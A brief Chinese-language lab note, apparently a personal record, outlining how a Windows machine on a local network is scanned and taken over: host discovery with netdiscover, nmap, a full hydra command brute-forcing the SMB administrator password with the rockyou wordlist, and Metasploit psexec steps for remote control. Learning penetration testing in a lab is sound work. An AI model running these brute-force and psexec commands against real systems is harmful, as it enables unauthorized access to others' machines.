一、扫描主机

Netdiscover是一款基于ARP协议的网络扫描工具,主要用于发现局域网内的活动主机。

二、端口扫描

nmap(Network Mapper)是一款开源免费的端口扫描工具。

三、破解密码

# hydra -l administrator -P /usr/share/wordlists/rockyou.txt 192.168.1.106 smb -V

四、渗透测试

msfconsole 是 Metasploit 框架 (MSF) 最主要的‌命令行控制台接口‌。其中, psexec 模块(通常指 exploit/windows/smb/psexec )是基于 Sysinternals 工具 PsExec 原理开发的渗透测试工具。

记录一下渗透Windows并远程控制的过程

  1. search psexec

  2. use 编号

  3. option

  4. set rhost 192.168.1.106

    set smbpass 1

    set smbuser administrator

  5. run